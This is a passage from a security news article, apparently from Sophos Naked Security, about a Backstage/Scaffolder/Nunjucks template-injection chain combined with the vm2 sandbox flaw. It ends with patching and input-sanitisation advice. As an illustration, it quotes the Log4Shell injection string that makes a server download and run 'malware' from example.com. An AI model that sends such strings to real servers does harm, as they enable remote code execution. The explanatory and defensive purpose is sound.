<aside id="sophos_ad-3" class="widget sophos-inline-ad sophos_widget_ad">				<style>.s-button+.s-button { margin-left: .3125rem; } .s-button { transition: all .15s linear; font-size: .875rem; line-height: 1.5; color: #f2f2f2; font-family: SophosSansMedium, Helvetica Neue, Helvetica, Arial, sans-serif; font-weight: 400; font-style: normal; display: inline-block; padding: .3125rem 1.25rem; cursor: pointer; text-align: center; text-decoration: none; border: 1px solid #005bc8; border-radius: 3px; background-color: #005bc8; text-shadow: none; } .s-button:hover { text-decoration: none; color: #fff; border-color: #002d62; background-color: #002d62; } .s-button--white, .s-button--white:hover { color: #005bc8 !important; border-color: #fff; background-color: #fff; } .s-ad-sophos-mdr { font-size: 1rem; line-height: 1.5; color: #242629; font-family: SophosSansRegular, Helvetica Neue, Helvetica, Arial, sans-serif; font-weight: 400; font-style: normal; position: relative; max-width: 769px; margin: 15px auto; padding: 30px 30px 25px; transition: box-shadow .25s cubic-bezier( .645, .045, .355, 1 ); text-align: center; background-color: #0d141d; background-repeat: no-repeat; background-position: 50%; background-size: cover; box-shadow: 0 0 0 0 0 transparent; background-color: #005bc8; background-image: none; background-position: 0 0; } .s-ad-sophos-mdr__title { font-size: 2rem; line-height: 1.125; margin-bottom: 4px; color: #fff; } .s-ad-sophos-mdr__text { font-family: SophosSansLight, Helvetica Neue, Helvetica, Arial, sans-serif; font-weight: 400; font-style: normal; font-size: 17px; color: #fff; } .s-ad-sophos-mdr__action { margin-top: 15px; } .s-ad-sophos-mdr__action .s-button { color: #fff; } .s-ad-sophos-mdr__link-wrapper { text-decoration: none; } .s-ad-sophos-mdr__link-wrapper:hover .s-ad-sophos-mdr { box-shadow: 0 5px 10px 0 rgba( 0, 0, 0, .15 ); } .s-ad-sophos-mdr__sophos-logo { position: absolute; top: 15px; right: 15px; } .s-ad-sophos-mdr__sophos-logo-svg { display: inline-block; width: 64px; height: 11px; vertical-align: top; background-repeat: no-repeat; background-size: 64px 11px; } .s-ad-sophos-mdr__title { font-family: SophosSansSemibold, Helvetica Neue, Helvetica, Arial, sans-serif; font-weight: 400; font-style: normal; font-size: 28px; font-weight: 700; line-height: 1; margin-bottom: 10px; text-align: left; } .s-ad-sophos-mdr__title svg { max-width: 100%; } .s-ad-sophos-mdr__text { font-size: 16px; line-height: 1.25; text-align: left; } .s-ad-sophos-mdr__action { text-align: right; } .s-ad-sophos-mdr .s-button { border-radius: 20px; } @media (min-width:769px) { .s-ad-sophos-mdr__text { margin-right: 140px; } .s-ad-sophos-mdr__action { position: absolute; right: 30px; bottom: 30px; } } @media (max-width:768px) { .s-ad-sophos-mdr { padding-top: 50px; } .s-ad-sophos-mdr__title { font-size: 1.625rem; } .s-ad-sophos-mdr__text { font-size: 16px; } .s-ad-sophos-mdr { padding-top: 30px; } }</style>
				<div class="sophos_widget_ad"><a href="https://www.sophos.com/en-us/products/managed-threat-response.aspx" class="s-ad-sophos-mdr__link-wrapper">
    <div class="s-ad-sophos-mdr">
        <div class="s-ad-sophos-mdr__title">
            <svg width="237" height="40" viewBox="0 0 237 40" xmlns="http://www.w3.org/2000/svg">
                <path d="M78.73 14.24v-.48c0-2.97-2.19-6.12-8.19-6.12-5.64 0-8.01 3.09-8.01 6.36 0 3.54 2.07 5.19 5.1 5.79l4.17.84c1.92.39 2.67 1.11 2.67 2.34 0 1.47-.93 2.64-3.78 2.64-3.18 0-3.99-1.2-3.99-2.46v-.33h-4.53v.42c0 2.94 1.77 6.12 8.61 6.12 6.24 0 8.37-3.15 8.37-6.99 0-3.69-2.88-5.22-5.64-5.76l-4.2-.84c-1.53-.3-2.34-.84-2.34-2.13 0-1.2.87-2.31 3.45-2.31 2.94 0 3.78 1.23 3.78 2.52v.39h4.53zM81.627 22.79c0 3.12 1.62 6.57 7.38 6.57s7.38-3.45 7.38-6.57v-3.66c0-3.12-1.62-6.57-7.38-6.57s-7.38 3.45-7.38 6.57v3.66zm10.44.03c0 1.44-.66 3-3.06 3s-3.06-1.56-3.06-3v-3.75c0-1.44.66-2.97 3.06-2.97s3.06 1.53 3.06 2.97v3.75zM107.009 25.52c-2.46 0-3.15-1.59-3.15-3.81v-1.53c0-2.19.69-3.78 3.15-3.78 2.31 0 2.88 1.5 2.88 3.54v2.01c0 2.07-.54 3.57-2.88 3.57zm1.35 3.84c3.54 0 5.85-2.37 5.85-6.33v-4.14c0-3.96-2.31-6.33-5.82-6.33-2.07 0-3.87.87-4.77 2.46l-.27-2.1h-3.81V34.4h4.32v-6.99c.93 1.26 2.58 1.95 4.5 1.95zM121.671 29v-8.79c0-2.19.69-3.81 3.15-3.81 2.22 0 2.79 1.53 2.79 3.51V29h4.32V18.83c0-3.9-2.22-6.27-5.73-6.27-1.92 0-3.57.75-4.53 2.07V7.1h-4.32V29h4.32zM134.888 22.79c0 3.12 1.62 6.57 7.38 6.57s7.38-3.45 7.38-6.57v-3.66c0-3.12-1.62-6.57-7.38-6.57s-7.38 3.45-7.38 6.57v3.66zm10.44.03c0 1.44-.66 3-3.06 3s-3.06-1.56-3.06-3v-3.75c0-1.44.66-2.97 3.06-2.97s3.06 1.53 3.06 2.97v3.75zM165.371 17.66v-.39c0-2.31-1.68-4.71-6.57-4.71-4.62 0-6.57 2.43-6.57 5.04 0 3.33 2.28 4.14 4.71 4.68l2.82.63c.9.21 1.74.54 1.74 1.5s-.72 1.74-2.52 1.74c-2.13 0-2.7-.72-2.7-1.5v-.36h-4.26v.45c0 2.22 1.59 4.62 6.93 4.62 5.16 0 6.81-2.49 6.81-5.37 0-3.21-2.52-4.14-4.65-4.62l-3.09-.69c-.96-.21-1.71-.54-1.71-1.41 0-.87.66-1.62 2.4-1.62 1.95 0 2.49.81 2.49 1.68v.33h4.17zM183.948 22.37h1.95l4.26-6.57V29h4.47V8h-4.2l-5.46 8.64-5.67-8.64h-3.96v21h4.23V16.01l4.38 6.36zM198.951 29h8.55c6.72 0 8.73-4.05 8.73-7.68v-5.64c0-3.63-2.01-7.68-8.73-7.68h-8.55v21zm4.56-3.99V11.99h3.99c3.27 0 4.14 2.01 4.14 3.96v5.1c0 1.95-.87 3.96-4.14 3.96h-3.99zM228.178 11.81c3.33 0 4.11 1.62 4.11 3.18s-.78 3.15-4.11 3.15h-3.69v-6.33h3.69zm.36 10.08l3.18 7.11h4.86l-3.63-7.92c2.97-1.23 3.96-3.66 3.96-6.15 0-3.54-1.98-6.93-8.76-6.93h-8.22v21h4.56v-7.11h4.05zM23.892 16.11h-1.629l-1.351 7.834h2.274c1.905 0 2.35-1.486 2.453-2.126l.532-3.03c.106-.59.132-1.413-.336-1.984-.381-.459-1.034-.695-1.943-.695z" fill="#fff" />
                <path d="M12.662 0c-1.5 0-3.226.662-4.476 1.692C6.86 2.784 6.07 4.632 5.898 5.31L0 40h32.047c2.032 0 6.277-.35 7.639-5.832L45.49 0H12.662zm2.033 25.883l.028-.16 1.307-7.516-2.793 3.835h-.984l-1.732-4.157-1.394 7.998H7.106l.029-.16 2.01-11.552h1.869l.035.078 2.057 4.95 3.74-5.028h2.008l-.028.16-2.012 11.552h-2.12zm8.538 0h-4.825l.028-.16 2.012-11.552h3.396c1.709 0 2.972.475 3.751 1.412.682.82.943 1.965.735 3.224l-.58 3.237c-.19 1.154-1.017 3.84-4.517 3.84zm11.981-4.407l1.233 4.407h-2.174l-1.156-4.135h-1.973l-.724 4.135H28.27l.028-.16 2.011-11.552h3.135c3.918 0 4.503 2.102 4.503 3.355 0 1.175-.358 3.225-2.732 3.95z" fill="#fff" />
                <path d="M33.427 16.044h-1.288l-.67 3.863h1.834c2.067 0 2.502-1.241 2.502-2.282-.006-.68-.252-1.58-2.378-1.58z" fill="#fff" />
            </svg>
        </div>
        <div class="s-ad-sophos-mdr__text">
            24/7 threat hunting, detection, and response delivered by an expert team as a fully-managed service.
        </div>
        <div class="s-ad-sophos-mdr__action">
      <span class="s-button s-button--white">
        Learn&nbsp;More
      </span>
        </div>
    </div>
</a>
</div>
			</aside>
<h2>An &#8220;Emmenthal cheese&#8221; attack</h2>
<p>Simply put, the newly disclosed security problems are the side-effect of a series of security issues, like holes in slices of Emmenthal cheese that could be permeated in sequence if an attacker is able to line up at least one hole on each slice.</p>
<p>As we understand it, Backstage includes a component called Scaffolder, which, as the name suggests, helps you to manage the various addons (known as plugins) that your developer community might want or need.</p>
<p>Scaffolder, in turn, makes use of a message logging system from Mozilla known as Nunjucks, which includes what&#8217;s known as <em>string templating</em> in <code>node.js</code> circles, as <em>string interpolation</em> in the Java world, and as <em>string substitution</em> to sysadmins who use command shells such as Bash.</p>
<p>If string interpolation rings a bell, it&#8217;s probably because it lay at the heart of the <a href="https://nakedsecurity.sophos.com/2021/12/13/log4shell-explained-how-it-works-why-you-need-to-know-and-how-to-fix-it/">Log4Shell</a> vulnerability back in December 2021, and of the <a href="https://nakedsecurity.sophos.com/2022/05/31/mysterious-follina-zero-day-hole-in-office-what-to-do/">Follina</a> bug in the middle of 2022.</p>
<p>It&#8217;s where you get to rewrite the contents of a logging message based on special &#8220;coding characters&#8221; in a string template, so that a string such as <code>$USER</code> might be replaced with the account name being used by the server, or <code>${PID}</code> might retrieve the current process ID.</p>
<p>In the extreme case of Log4Shell, the curious looking incantation <code>${jndi:ldap://example.com:8888/malware}</code> could directly trick the server into downloading a program called <code>malware</code> from <code>example.com</code> and silently running it in the background.</p>
<p>In other words, you need to make absolutely certain that data arriving from an untrusted source, such as an outside user, is never passed blindly into a string templating or string interpolation function to be used <em>as the template text itself</em>.</p>
<p>If a remote user, for instance, tries to trick your server by giving their username as <code>${{RISKY}}</code> (assuming the templating library uses <code>${{...}}</code> as its special marker), you need to ensure that your logging code will correctly record that naughty-looking text literally as it was received&#8230;</p>
<p>&#8230;rather than allowing the text being logged to take control over the logging function itself!</p>
<p>In the words of an old nursery rhyme, you need to ensure that you don&#8217;t end up singing, &#8220;There&#8217;s a hole in my <code>${{BUCKET}}</code>, dear Liza, dear Liza, there&#8217;s a hole in my <code>${{BUCKET}}</code>, dear Liza. A hole!&#8221;</p>
<h2>Wrapped in a safety blanket</h2>
<p>To be fair, the perhaps-too-powerful templating/interpolation functionality of Nunjucks is wrapped by Backstage inside yet another supply-chain component, namely the aforementioned sandboxing system vm2, which is supposed to restrict the danger that a malicious user could do with booby-trapped input data.</p>
<p>Unfortunately, Oxeye researchers were able to pair their newly-discovered string templating code-triggering paths in Backstage + Scaffolder + Nunjucks with the older CVE-2022-36067 vulnerability in the vm2 security wrapper in order to achieve potential remote code execution on a Backstage server.</p>
<h2>What to do?</h2>
<p>If you&#8217;re a Backstage user:</p>
<ul>
<li><b>Ensure you have the latest versions of Backstage and its dependencies,</b> including the <code>plugin-scaffolder-backend</code> component. According to Oxeye, the relevant bugs in the Backstage code were patched by 01 September 2022, so that any official point release after that data should include the fixes. At the time of writing [2022-11-1T16:00Z], that includes Backstage <b>1.6.0</b>, <b>1.7.0</b> and <b>1.8.0</b>, released on 2022-09-21, 2022-10-18, and 2022-11-15 respectively.
<li><b>Check that your Backstage installation has authentication configured as you expect.</b> Oxeye claims that authentication is off by default, and that after following the <a href="https://backstage.io/docs/auth/" rel="nofollow">Backstage guidelines</a>, backend servers (which are probably not supposed to be exposed externally anyway) still allowed unauthenticated access. That may be what you want, but we recommend using this issue as a reason to check that your setup matches your intentions.
<li><b>Check which parts of your Backstage infrastructure can be reached from the internet.</b> Once again, use this issue as a reason to scan your own network from the outside if you haven&#8217;t done so recently.
</ul>
<p>If you are a node.js/NPM user:</p>
<ul>
<li><b>Ensure you have the latest version of the vm2 sandbox component.</b> You may have this installed as a dependency of other software you use, even if you don&#8217;t have Backstage. The CVE-2022-36067 vulnerability was patched on 2022-08-28, so you want vm2 version <b>3.9.11</b> or later.
</ul>
<p>If you are a programmer:</p>
<ul>
<li><b>Be as defensive as you can when calling powerful logging functions.</b> If you us a logging service (including Nunjucks or Log4J) that includes powerful templating/interpolation features, turn off any features you don&#8217;t need so that they can&#8217;t be exploited by mistake. Ensure that untrusted input is never itself used as a template, thus preventing attackers from rolling their own directly dangerous input strings.
<li><b>Regardless of any other precautions in place, sanitise your your logging inputs and outputs.</b> Remember that someone else will need to open your logfiles in the future. Non&#8217;t allow any inadvertent booby-traps to get written into your logfile where they could cause trouble later on, such as HTML fragments with script tags left in. (Someone might open the file in a browser by mistake.)
</ul>
<p>Even when you receive input from a trusted source, there&#8217;s rarely any reason not to put it through your own sanitisation checks before you use it. </p>
<p>(You may occasionally justify an exception, for example for performance reasons, but it should be an exception, not the rule.)</p>
<p>Firstly, checking again helps you spot errors that previous coders may have made in good faith; secondly, it helps to limit the spread of bad or booby-trapped data if some other part of your ecosystem gets compromised.</p>
<p>The thing about those slices of Emmenthal cheese we mentioned earlier on is that although they&#8217;re permeable if at least one hole lines up on every sheet&#8230;</p>
<p>&#8230;they&#8217;re impermeable if there&#8217;s at least one sheet with holes that don&#8217;t line up at all!</p>
<hr style='margin-top:2em'>
			</div> <!-- .entry-content -->
	<ul class="block social follow">
		<li>
			<svg style="height: 24px" viewBox="0 0 24 24" class="icon twitter"><use xlink:href="#twitter"></use></svg>
			<p>Follow <strong><a href="https://twitter.com/nakedsecurity">@NakedSecurity on Twitter</a></strong> for the latest computer security news.</p>
		</li>
		<li>
			<svg style="height: 24px" viewBox="0 0 24 24" class="icon instagram"><use xlink:href="#instagram"></use></svg>
			<p>Follow <strong><a href="https://www.instagram.com/nakedsecurity/">@NakedSecurity on Instagram</a></strong> for exclusive pics, gifs, vids and LOLs!</p>
		</li>
	</ul>
</article><!-- #post-## -->

		<div class="free-tools-block">
			<h2 class="block-title">Free tools</h2>

<div class="ns-free-tools">
	<div class="ns-free-tools__item ns-free-tools__item--sophos-home">
		<a class="ns-free-tools__link" href="https://www.sophos.com/en-us/products/free-tools/sophos-xg-firewall-home-edition.aspx">
			<figure class="ns-free-tools__image">
				<svg width="40" height="40" fill="none" xmlns="http://www.w3.org/2000/svg">
					<path d="M25.833 32.023H9.167a.417.417 0 0 0-.417.417v6.25c0 .23.187.417.417.417h16.666c.23 0 .417-.187.417-.417v-6.25a.417.417 0 0 0-.417-.417ZM1.25 32.023a.416.416 0 0 0-.417.417v5A1.667 1.667 0 0 0 2.5 39.107h3.333a.416.416 0 0 0 .417-.417v-6.25a.417.417 0 0 0-.417-.417H1.25ZM38.75 29.523a.416.416 0 0 0 .417-.416v-5A1.667 1.667 0 0 0 37.5 22.44H20a.416.416 0 0 0-.417.417v6.25a.416.416 0 0 0 .417.416h18.75ZM28.75 38.69a.417.417 0 0 0 .417.417H37.5a1.666 1.666 0 0 0 1.667-1.667v-5a.416.416 0 0 0-.417-.417h-9.583a.417.417 0 0 0-.417.417v6.25ZM16.667 29.523a.417.417 0 0 0 .416-.416v-6.25a.417.417 0 0 0-.416-.417H2.5a1.667 1.667 0 0 0-1.667 1.667v5a.417.417 0 0 0 .417.416h15.417ZM29.38 7.883h-.435l-2.622 3.284a.417.417 0 0 1-.728-.152c-.809-2.964-.737-6.1.207-9.023a.832.832 0 0 0-.909-1.084 15.864 15.864 0 0 0-11.525 7.667.417.417 0 0 1-.489.186.421.421 0 0 1-.16-.094l-1.834-1.779a.832.832 0 0 0-1.217.059 12.458 12.458 0 0 0-2.356 11.87.415.415 0 0 0 .396.288h5.549a.416.416 0 0 0 .41-.342 8.858 8.858 0 0 1 4.428-6.22.833.833 0 0 1 1.215.97 6.572 6.572 0 0 0 .43 4.834.42.42 0 0 0 .353.226 2.149 2.149 0 0 0 1.805-1.105.832.832 0 0 1 1.272-.181c.47.44.845.972 1.1 1.563a.419.419 0 0 0 .382.248h5.965a.418.418 0 0 0 .396-.288A12.47 12.47 0 0 0 29.38 7.875v.008Z" fill="#000"/>
				</svg>
			</figure>
			<h4 class="ns-free-tools__title">
				Sophos Firewall Home Edition			</h4>
			<div class="ns-free-tools__sub-title">
				Boost your home network security.			</div>
		</a>
	</div>
	<div class="ns-free-tools__item ns-free-tools__item--hitman-pro">
		<a class="ns-free-tools__link" href="https://www.sophos.com/en-us/products/free-tools/virus-removal-tool.aspx">
			<figure class="ns-free-tools__image">
				<svg width="40" height="40" fill="none" xmlns="http://www.w3.org/2000/svg">
					<path d="M10.833 36.667H3.75a.416.416 0 0 1-.417-.417v-7.083a1.666 1.666 0 1 0-3.333 0v7.5A3.333 3.333 0 0 0 3.333 40h7.5a1.666 1.666 0 1 0 0-3.333ZM1.667 12.5a1.667 1.667 0 0 0 1.666-1.667V3.75a.417.417 0 0 1 .417-.417h7.083a1.666 1.666 0 1 0 0-3.333h-7.5A3.333 3.333 0 0 0 0 3.333v7.5A1.666 1.666 0 0 0 1.667 12.5ZM38.333 27.5a1.667 1.667 0 0 0-1.666 1.667v7.083a.416.416 0 0 1-.417.417h-7.083a1.667 1.667 0 1 0 0 3.333h7.5A3.333 3.333 0 0 0 40 36.667v-7.5a1.666 1.666 0 0 0-1.667-1.667ZM36.667 0h-7.5a1.666 1.666 0 1 0 0 3.333h7.083a.417.417 0 0 1 .417.417v7.083a1.667 1.667 0 1 0 3.333 0v-7.5A3.333 3.333 0 0 0 36.667 0ZM20 22.5a2.5 2.5 0 1 0 0-5 2.5 2.5 0 0 0 0 5Z" fill="#000"/>
					<path d="M8.07 18.762a1.855 1.855 0 0 0 0 2.473c2.833 3.137 7.438 6.334 11.982 6.264 4.54.076 9.14-3.127 11.98-6.264a1.853 1.853 0 0 0 0-2.473c-2.9-3.204-7.515-6.334-11.977-6.26-4.468-.075-9.085 3.056-11.985 6.26ZM24.167 20a4.167 4.167 0 1 1-8.334 0 4.167 4.167 0 0 1 8.334 0ZM20 7.5a1.667 1.667 0 0 0 1.667-1.667v-2.5a1.667 1.667 0 0 0-3.334 0v2.5A1.667 1.667 0 0 0 20 7.5ZM20 32.5a1.667 1.667 0 0 0-1.667 1.667v2.5a1.667 1.667 0 0 0 3.334 0v-2.5A1.667 1.667 0 0 0 20 32.5ZM38.333 18.333h-2.5a1.666 1.666 0 1 0 0 3.334h2.5a1.667 1.667 0 0 0 0-3.334ZM1.667 21.667h2.5a1.667 1.667 0 1 0 0-3.334h-2.5a1.666 1.666 0 1 0 0 3.334Z" fill="#000"/>
				</svg>
			</figure>
			<h4 class="ns-free-tools__title">
				Sophos Scan &amp; Clean			</h4>
			<div class="ns-free-tools__sub-title">
				Free second-opinion scanner for PCs.			</div>
		</a>
	</div>
	<div class="ns-free-tools__item ns-free-tools__item--intercept-x">
		<a class="ns-free-tools__link" href="https://aws.amazon.com/marketplace/pp/prodview-7silxvfxce4zq?qid=1599237395672&sr=0-1&ref_=srh_res_product_title">
			<figure class="ns-free-tools__image">
				<svg width="40" height="40" fill="none" xmlns="http://www.w3.org/2000/svg">
					<path d="M3.241 24.179a1.698 1.698 0 0 0 2.362-.57 1.68 1.68 0 0 0 .234-.859 1.564 1.564 0 0 0-.758-1.342 3.706 3.706 0 0 1-.676-.52 3.932 3.932 0 0 1-1.065-2.96A4.28 4.28 0 0 1 4.6 14.894a4.321 4.321 0 0 1 3.938-1.165 1.674 1.674 0 0 0 1.831-.898c.108-.22.165-.46.169-.703.14-9.544 13.83-12.215 18.03-3.393a1.618 1.618 0 0 0 1.569.948 6.19 6.19 0 0 1 4.985 2.146 6.398 6.398 0 0 1 1.527 4.607 5.684 5.684 0 0 1-1.965 4.121 1.581 1.581 0 0 0-.52 1.198 1.641 1.641 0 0 0 .939 1.495 1.66 1.66 0 0 0 1.759-.206 8.952 8.952 0 0 0 2.327-3.084 8.914 8.914 0 0 0 .807-3.773 9.536 9.536 0 0 0-2.407-6.604 9.617 9.617 0 0 0-6.29-3.184.418.418 0 0 1-.317-.199 12.786 12.786 0 0 0-5.593-5.014 12.856 12.856 0 0 0-7.456-1.02 12.827 12.827 0 0 0-6.744 3.326 12.735 12.735 0 0 0-3.702 6.524.416.416 0 0 1-.378.332 7.758 7.758 0 0 0-3.491 1.122 7.717 7.717 0 0 0-2.58 2.597 7.405 7.405 0 0 0-1.033 4.06 7.084 7.084 0 0 0 2.058 5.126c.358.35.753.66 1.178.926Z" fill="#000"/>
					<path d="m17.818 39.424.921.35a3.44 3.44 0 0 0 2.451 0l.922-.35c5.134-1.947 8.72-6.587 8.72-11.28v-5.636a2.556 2.556 0 0 0-1.547-2.35 27.468 27.468 0 0 0-9.32-1.725c-3.162.026-6.293.61-9.249 1.726-.46.199-.85.527-1.125.945a2.555 2.555 0 0 0-.421 1.404v5.624a12.765 12.765 0 0 0 2.607 6.95 12.852 12.852 0 0 0 6.041 4.342Zm-2.816-10.629c-.332 0-.65-.13-.884-.364a1.242 1.242 0 0 1 .884-2.124h3.332a.418.418 0 0 0 .417-.415v-3.318c0-.33.132-.646.366-.88a1.253 1.253 0 0 1 1.767 0c.235.234.366.55.366.88v3.318a.414.414 0 0 0 .417.415H25c.331 0 .649.13.883.364A1.241 1.241 0 0 1 25 28.795h-3.333a.417.417 0 0 0-.417.415v3.318c0 .33-.131.646-.366.88a1.253 1.253 0 0 1-1.767 0 1.241 1.241 0 0 1-.366-.88V29.21a.414.414 0 0 0-.417-.415h-3.332Z" fill="#000"/>
				</svg>
			</figure>
			<h4 class="ns-free-tools__title">
				Sophos Cloud Optix			</h4>
			<div class="ns-free-tools__sub-title">
				Monitor 25 cloud assets for free.			</div>
		</a>
	</div>
</div>
		</div>

			<nav class="navigation post-navigation" role="navigation">
		<h2 class="screen-reader-text">Post navigation</h2>

		<div class="nav-links">
			<div class="nav-previous"><a href="https://nakedsecurity.sophos.com/2022/11/14/gucci-master-business-email-scammer-hushpuppi-gets-11-years/" rel="prev"><span class="nav-label">Previous</span><span class="nav-seperator">:</span><span class="nav-title"> &#8220;Gucci Master&#8221; business email scammer Hushpuppi gets 11 years</span></a></div>		</div>
		<!-- .nav-links -->
	</nav><!-- .navigation -->
	
	
	</main><!-- #main -->

	</div> <!-- .panel-container -->
	</div> <!-- .container -->
	</section> <!-- .panel -->

	


	<section class="recommended-panel">
	<div class="container">
	<div class="panel-content ">

		<h3 class="block-title">Recommended reads</h3>
	<div class="blocks">
		<article id="post-764831" class="card-slide">
	<div class="card-image">
		<div class="image-pointer"></div>
		<a href="https://nakedsecurity.sophos.com/2022/10/07/whatsapp-goes-after-chinese-password-scammers-via-us-court/"><div class="dynamic-image-frame">
		<div class="dynamic-image" style="background-image: url(https://nakedsecurity.sophos.com/wp-content/uploads/sites/2/2022/10/wa-1200.png?w=412&#038;h=200&#038;crop=1);"></div>
	</div></a>
	</div>
	<div class="card-content">
		<div class="meta-box">
			<div class="date-box">
				<span class="month">Oct</span><span class="day">07</span>
			</div>
 			<div class="author-box">
			<span class="by">by</span>
		Paul Ducklin	
	</div>
			<div class="comment-box">
				<span class="count">5</span>
			</div>
		</div>
		<h3 class="card-title"><a href="https://nakedsecurity.sophos.com/2022/10/07/whatsapp-goes-after-chinese-password-scammers-via-us-court/" rel="bookmark">WhatsApp goes after Chinese password scammers via US court</a></h3>	</div>
</article> <!-- .card-article -->
<article id="post-790970" class="card-slide">
	<div class="card-image">
		<div class="image-pointer"></div>
		<a href="https://nakedsecurity.sophos.com/2022/10/18/dangerous-hole-in-apache-commons-text-like-log4shell-all-over-again/"><div class="dynamic-image-frame">
		<div class="dynamic-image" style="background-image: url(https://nakedsecurity.sophos.com/wp-content/uploads/sites/2/2022/10/act-1200.png?w=412&#038;h=200&#038;crop=1);"></div>
	</div></a>
	</div>
	<div class="card-content">
		<div class="meta-box">
			<div class="date-box">
				<span class="month">Oct</span><span class="day">18</span>
			</div>
 			<div class="author-box">
			<span class="by">by</span>
		Paul Ducklin	
	</div>
			<div class="comment-box">
				<span class="count">4</span>
			</div>
		</div>
		<h3 class="card-title"><a href="https://nakedsecurity.sophos.com/2022/10/18/dangerous-hole-in-apache-commons-text-like-log4shell-all-over-again/" rel="bookmark">Dangerous hole in Apache Commons Text &#8211; like Log4Shell all over again</a></h3>	</div>
</article> <!-- .card-article -->
<article id="post-801455" class="card-slide">
	<div class="card-image">
		<div class="image-pointer"></div>
		<a href="https://nakedsecurity.sophos.com/2022/11/01/sha-3-code-execution-bug-patched-in-php-check-your-version/"><div class="dynamic-image-frame">
		<div class="dynamic-image" style="background-image: url(https://nakedsecurity.sophos.com/wp-content/uploads/sites/2/2022/11/xkcp-1200.png?w=412&#038;h=200&#038;crop=1);"></div>
	</div></a>
	</div>
	<div class="card-content">
		<div class="meta-box">
			<div class="date-box">
				<span class="month">Nov</span><span class="day">01</span>
			</div>
 			<div class="author-box">
			<span class="by">by</span>
		Paul Ducklin	
	</div>
			<div class="comment-box">
				<span class="count">0</span>
			</div>
		</div>
		<h3 class="card-title"><a href="https://nakedsecurity.sophos.com/2022/11/01/sha-3-code-execution-bug-patched-in-php-check-your-version/" rel="bookmark">SHA-3 code execution bug patched in PHP &#8211; check your version!</a></h3>	</div>
</article> <!-- .card-article -->
	</div>

	</div> <!-- .panel-container -->
	</div> <!-- .container -->
	</section> <!-- .panel -->

	
	
	<footer id="colophon" class="site-footer" role="contentinfo">
		<div class="footer-container">
			<a href="#" class="js-collapse-footer"><svg style="height: 20px" viewBox="0 0 132 24" class="block icon sophos"><use xlink:href="#sophos"></use></svg></a>
			<div id="collapseFooter" class="blocks">
				<div class="sophos block">
					<ul id="menu-footer-primary" class="primary menu"><li id="menu-item-306737" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-306737"><a href="https://nakedsecurity.sophos.com/about/">About Naked Security</a></li>
<li id="menu-item-306754" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-306754"><a href="https://www.sophos.com/en-us/company.aspx">About Sophos</a></li>
<li id="menu-item-306747" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-306747"><a href="https://nakedsecurity.sophos.com/send-us-a-tip/">Send us a tip</a></li>
<li id="menu-item-323171" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-323171"><a href="/cookies-and-scripts/">Cookies</a></li>
<li id="menu-item-323170" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-323170"><a href="https://www.sophos.com/en-us/legal/sophos-group-privacy-policy.aspx">Privacy</a></li>
<li id="menu-item-323169" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-323169"><a href="https://www.sophos.com/en-us/legal.aspx">Legal</a></li>
</ul>				</div>
										<div class="news block">
							<ul id="menu-products-column-one" class="small menu"><li id="menu-item-306998" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-306998"><a href="https://www.sophos.com/en-us/products/intercept-x.aspx">Intercept X</a></li>
<li id="menu-item-440801" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-440801"><a href="https://www.sophos.com/en-us/products/server-security.aspx">Intercept X for Server</a></li>
<li id="menu-item-440802" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-440802"><a href="https://www.sophos.com/en-us/products/mobile-control.aspx">Intercept X for Mobile</a></li>
</ul>						</div>
											<div class="products block">
							<ul id="menu-products-column-two" class="small menu"><li id="menu-item-440803" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-440803"><a href="https://www.sophos.com/en-us/products/next-gen-firewall.aspx">XG Firewall</a></li>
<li id="menu-item-440805" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-440805"><a href="https://www.sophos.com/en-us/products/sophos-email.aspx">Sophos Email</a></li>
<li id="menu-item-440804" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-440804"><a href="https://www.sophos.com/en-us/products/secure-wifi.aspx">Sophos Wireless</a></li>
</ul>						</div>
											<div class="threats block">
							<ul id="menu-server-protection" class="small menu"><li id="menu-item-440806" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-440806"><a href="https://www.sophos.com/en-us/products/managed-threat-response.aspx">Managed Threat Response</a></li>
<li id="menu-item-448404" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-448404"><a href="https://www.sophos.com/en-us/products/cloud-optix.aspx">Cloud Optix</a></li>
<li id="menu-item-440807" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-440807"><a href="https://www.sophos.com/en-us/products/phish-threat.aspx">Phish Threat</a></li>
</ul>						</div>
								</div>
			<ul class="block social footer">
				<li class="twitter"><a rel="nofollow" href="https://twitter.com/NakedSecurity" title="Follow our team of security experts on Twitter"><svg style="height: 14px" viewBox="0 0 100 100" class="icon twitter"><use xlink:href="#twitter"></use></svg></a></li>
				<li class="facebook"><a rel="nofollow" href="https://www.facebook.com/SophosSecurity" title="Join over 250,000 people in our Facebook community"><svg style="height: 14px" viewBox="0 0 100 100" class="icon facebook"><use xlink:href="#facebook"></use></svg></a></li>
				<li class="instagram"><a rel="nofollow" href="https://www.instagram.com/nakedsecurity/" title="Follow Naked Security on Instagram"><svg style="height: 14px" viewBox="0 0 100 100" class="icon instagram"><use xlink:href="#instagram"></use></svg></a></li>
				<li class="linkedin"><a rel="nofollow" href="https://www.linkedin.com/company/5053/" title="Join the naked security discussion group on LinkedIn"><svg style="height: 14px" viewBox="0 0 100 100" class="icon linkedin"><use xlink:href="#linkedin"></use></svg></a></li>
				<li class="rss"><a rel="nofollow" href="/feed" title="Subscribe to our RSS feed"><svg style="height: 14px" viewBox="0 0 100 100" class="icon rss"><use xlink:href="#rss"></use></svg></a></li>
			</ul>

							<div class="vip-powered-wpcom">
					<span class="copyright">© 1997 - 2022 Sophos Ltd.</span>
					All rights reserved.
					Powered by <a href="https://wpvip.com/?utm_source=vip_powered_wpcom&#038;utm_medium=web&#038;utm_campaign=VIP%20Footer%20Credit&#038;utm_term=nakedsecurity.sophos.com" rel="generator nofollow" class="powered-by-wpcom">WordPress VIP</a>				</div>
					</div>
		<script type="text/javascript">
			window.cookieconsent_options = {
				"message":"This site uses cookies. By continuing to browse the site you are agreeing to our use of cookies.",
				"dismiss":"Got it!",
				"learnMore":"Learn More",
